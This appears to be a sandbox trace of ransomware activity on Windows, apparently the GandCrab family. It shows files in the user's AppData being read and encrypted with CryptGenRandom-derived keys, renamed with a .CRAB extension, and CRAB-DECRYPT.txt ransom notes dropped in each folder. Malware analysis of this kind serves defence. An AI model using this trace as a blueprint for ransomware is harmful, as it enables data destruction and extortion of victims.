| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav, size = 1048576, size_out = 27784 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav, size = 27792 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp, size = 1048576, size_out = 94389 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp, size = 94400 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3, size = 1048576, size_out = 2043 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3, size = 2048 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif, size = 1048576, size_out = 34322 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif, size = 34336 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png, size = 1048576, size_out = 31408 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png, size = 31408 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, size = 1048576, size_out = 7870 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, size = 7872 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, size = 1048576, size_out = 637 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, size = 640 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, size = 1048576, size_out = 425 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, size = 432 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\EYGUEQKQ\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\EYGUEQKQ\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy, size = 1048576, size_out = 23372 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy, size = 23376 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, size = 1048576, size_out = 216 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, size = 224 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, size = 1048576, size_out = 18761 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, size = 18768 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3, size = 1048576, size_out = 51502 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3, size = 51504 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
